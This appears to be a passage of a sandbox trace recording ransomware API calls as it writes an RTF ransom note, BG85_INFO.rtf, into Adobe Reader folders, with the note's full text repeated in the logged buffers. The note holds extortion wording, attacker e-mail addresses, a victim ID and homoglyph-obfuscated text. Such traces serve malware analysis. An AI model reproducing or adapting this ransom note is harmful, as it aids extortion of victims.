uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.000] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n…:ºbü…~¯½h\x02×B\x16to@ÀNBåÏ\x07\\\x17ò»\x1c¦\x15¾y³¢H1\x13\x0fSopwu=\x08,}\x1f\n", lpUsedDefaultChar=0x0) returned 7247 [0071.000] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0071.002] CloseHandle (hObject=0x1bc) returned 1 [0071.002] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\bg85_info.rtf")) returned 0xffffffff [0071.002] GetLastError () returned 0x2 [0071.002] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0071.055] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 